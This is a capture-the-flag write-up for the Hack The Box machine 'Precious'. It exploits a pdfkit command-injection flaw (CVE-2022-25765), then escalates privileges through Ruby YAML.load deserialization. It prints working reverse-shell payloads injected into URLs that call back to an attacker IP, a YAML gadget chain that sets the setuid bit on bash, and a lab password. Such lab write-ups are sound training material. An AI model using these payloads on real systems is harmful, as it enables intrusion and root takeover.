[Original] HTB Precious (easy)
Posted: 2022-12-12 11:57 1001
References: https://read.infos3c.net/hack-the-box-htb-writeup-precious
https://meowmeowattack.github.io/htb/precious/
Only ports 22 and 80 are open.
`sudo vim /etc/hosts`, add precious.htb, then open the site.
The site offers a service that converts a web page into a PDF file. Start a local web server and try it.
Inspect the metadata of the resulting file with Exiftool.
The file was generated by the PDF generation library pdfkit v0.8.6. A Google search turns up CVE-2022-25765:
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
It looks like command execution.
Build a shell from a shell template:
https://www.revshells.com/
https://github.com/Atsukoro1/PDFKitExploit/blob/master/exploit.sh
This is a Ruby bug; the Python payload does not work.
No permission to read the flag.
Under the ruby user there is a config file in .bundle, and henry's password is in it:
"henry:Q3c1AqGHtoI0aXAYFH"
Use the password to SSH into the target.
Run `sudo -l` to see what this user may run: henry can run the file update_dependencies.rb as root.
Reading the code shows it uses YAML.load, which is vulnerable to deserialization attacks.
Reference:
https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/
Sample code:
https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
```text
http://10.10.16.3:80/?name=`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.af_inet,socket.sock_stream);s.connect(("10.10.16.3",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'`
```
```text
http://10.10.16.3/?name=%20`ruby -rsocket -e 'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.16.3",9001))'`
```
```yaml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: chmod +s /usr/bin/bash
         method_id: :resolve
```